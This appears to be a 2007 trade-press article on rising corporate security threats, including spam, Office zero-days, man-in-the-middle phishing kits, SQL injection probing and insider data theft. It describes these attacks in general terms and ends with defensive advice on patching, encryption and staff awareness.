Hackers are getting more clever and more greedy. Staff
are being bribed to disclose customer information, and the internet
is made up of a growing army of hijacked PCs that spew out an
endless flood of
spam,
phishing scams and
malware on to an ill-defended world. It is
not a pretty picture.
Reading through the security companies' latest reports is enough
to make you turn off the computers, shut down the networks and go
back to quill pens. Well, almost.
The security companies want you to buy their products, of
course, and therefore have an interest in painting the worst of
pictures, but there is enough evidence to show that the situation
is getting worse.
Take spam, for instance. According to security company SoftScan,
90.3% of e-mail was spam during February, and on one Sunday the
level reached 96.22%. And security company Postini said spam
reached 94% last December, up by 114% on the previous December.
Apart from all that wasted bandwidth, you have the problem of
filtering out the good from the bad and the ugly. That takes money
and processing power, and in order to keep out most of the dross,
you inevitably end up quarantining valid messages. In the process,
the e-mail system that has served you well for the past couple of
decades starts to be more troublesome to manage and use.
The inconvenience is the least of the problems, though. Spam
increasingly comes with a vicious payload, designed to take control
of the target computer, and also to steal information from it.
For example, last December the
Happy New Year worm drove the daily volume of
e-mail-borne viruses on the internet up by a factor of 20 on New
Year's weekend. Also known as Nuwar and Mixor, the worm used social
engineering techniques designed to exploit people's expectations of
legitimate New Year's postcards and greetings from friends and
family.
Serious professionals might not fall for that scam, but what
about opening an innocent-looking Word document? According to Ollie
Whitehouse, a threat researcher at Symantec, hackers have been
forced to become more cunning as users get smarter.
He said Symantec detected five zero-day exploits released
against Microsoft Office in the period from July to December 2006.
For this attack method, hackers use unpatched vulnerabilities to
lure users into opening a word processing document, presentation or
spreadsheet.
This triggers malicious code, which downloads a back door or
Trojan dropper on to the machine, which can then dial out to get a
more feature-rich piece of malicious code.
"It appears to be an effective way for these malicious
individuals to compromise the machines of people who would regard
themselves as security-aware. The hacker then uses it to gain
access to personal information, and the machine can be used in a
botnet," said Whitehouse.
Phishing attacks also show no sign of going away. Having started
by targeting the banks, phishers now go for any company with a web
presence that holds customer information.
Paypal, Amazon and eBay have become obvious targets, and Virgin
Media was a recent victim, with a spoofed e-mail asking customers
to re-confirm their account details.
But phishers too are getting more cunning, according to Mikko
Hyppönen, chief technologist at security company F-Secure. He is
especially concerned about the rise of man-in-the-middle
attacks.
"We saw the first real man in the middle attacks about 11 months
ago, one targeting Paypal, the other targeting a big US bank," he
says.
"Last week we found five separate kits for man-in-the-middle
attacks, targeting sites such as Amazon."
He describes one recent attack aimed at a well-known online
retailer: "You get an e-mail asking you to clarify something about
your account. You follow a link and end up on a page that looks
just like the retailer's site. It asks you for your user name and
password, which it sends off to the bad boys just as in traditional
scams.
"But it also uses the user name and password to log into the
real site. It goes to your profile page and it downloads all the
information about you. It then creates a new page, which asks the
user to 'confirm' their details."
Here is the clever bit. Having "legitimate" access to the user's
account, it can present a whole page of valid information to
reassure the user, even a list of their payment details with just
the last four digits of the credit card showing.
In a devious trick of reverse psychology, it then asks the user
to prove who they are by filling in the blanked-out digits of the
credit card number.
Worst of all, Hyppönen says, the attacks are now becoming
available as toolkits on the internet, so everyone can have a try.
And researchers from security company RSA have recently discovered
a new universal man-in-the-middle phishing kit, which allows the
would-be fraudster to create a fraudulent URL via a simple and
user-friendly online interface.
This means that just about any company with an e-commerce
presence could become a target of phishing scams.
Apart from constantly reminding their customers of the dangers
of such attacks, e-commerce companies have little option but to
subscribe to a service. An example is RSA's FraudactionSM
anti-phishing and anti-pharming service, which operates a broad
monitoring and detection network to block rogue sites quickly.
Of course, it is not just the blunderbuss effect of spam and
phishing that companies need to worry about. Most security
researchers report that hackers are still using crafted attacks to
get into companies to steal information, sometimes sponsored by
rivals looking for competitive information, or even by foreign
governments in some cases.
Hyppönen says his company investigated a handful of such cases
last year, but admits they could be the tip of an otherwise
undiscovered iceberg.
One example comes from Secerno, which specialises in database
protection. Chief executive Paul Davie says one of his clients, an
online travel company, was recently visited by a hacker looking for
crucial information.
"We put systems in before Christmas and reviewed the progress in
January, going through a couple of days' traffic. Out of hundreds
of thousands of instructions, there was just one that contained
some code that sought to find out, using simple bit-mapping within
SQL injection, which standard management accounts the company had
set up as system administrator accounts," says Davie.
"It was beautifully crafted. It was effectively a scouting
instruction, designed to find out where the vulnerabilities lay in
the system. We passed it round to some penetration testers in the
industry. They had not seen this code before there was no way there
was a signature looking for it.
"They could find out which of 16 possible administrator accounts
were being used. The owner of the system nearly fell off his chair
when we explained what it could have done."
The Secerno system had blocked the attack because it checks for
anomalous behaviour, however, a signature-based defence would not
have picked it up.
However, external attacks still only account for about 20% of
the dangers facing system owners. The rest come from insiders with
proper authentication and passwords.
Offshore call centres in India received bad publicity last year
when it was discovered that personal data was being sold by
workers. But the situation is no better in places like Glasgow,
where local police estimate one in 10 call centres has been
infiltrated by criminal gangs, or in Newcastle, where call centre
staff are regularly accosted by crooks with wads of cash trying to
buy personal information.
A company's own staff may pose equal danger, if only by
accident. For instance, the Nationwide employee who had his laptop
stolen last year from his home could hardly have foreseen the
£980,000 fine his employer would have to pay, on account of the
personal information that was stored on the machine.
In that particular case, encrypting the files would have
adequately secured the data, a solution that Nationwide has since
adopted.
New research from content security company Clearswift flags
further potential problems from younger staff who have grown up
with the internet and who have moved seamlessly into Web 2.0.
A YouGov survey of 1,000 companies found that workers between
the ages of 18 and 29 regarded regular visits to YouTube, MySpace
and blogs as a natural part of their working day. Twenty-seven per
cent admitted spending three or more hours on such sites at work,
and 42% admitted to discussing work-related issues on the
sites.
Companies need to maintain a fine balance between harnessing new
technologies for business benefits and maintaining security, Ian
Bowles, chief operating officer at Clearswift says. And most
workers now expect some level of personal e-mail and internet
access as a right. A blanket ban would be unacceptable in most
organisations.
So what does a company do to prevent this onslaught on its
security, both from the outside and within? The answer is to go
back to basics.
The general consensus among security experts is to assess risks
and manage them through a combination of people, process and
technology.
Apply defence in depth, from the basic anti-virus and anti-spam
functions (which could come as a service) to the more sophisticated
content filtering and behavioural monitoring, in order to control
staff activity. And patch vulnerabilities quickly where they expose
a risk.
It is also important to apply data encryption to sensitive data
so that a stolen laptop or Blackberry will not be a disaster. But
also make sure you manage the encryption keys so that data is
accessible when you need it.
And finally make sure you train staff to be security-aware.
"If you have a staff culture where people have been made aware
of security and have been told about social engineering exploits,
for instance, then they will avoid a lot of the problems," said
Mark Jones, a partner in charge of security and risk at Atos
Origin.
"It does not need a lot of expense or training, but it can lift
security cost-effectively across the whole organisation."
TJX hack the biggest in history >>
Certification to close door on hackers
>>
Hackers broaden cross-site attacks >>
David Lacey’s security blog >>The
latest ideas, best practices, and business issues associated with
managing security
Stuart King’s risk management blog
>>Dealing with the operational challenges of
information security and risk management
Comment on this article:
computer.weekly@rbi.co.uk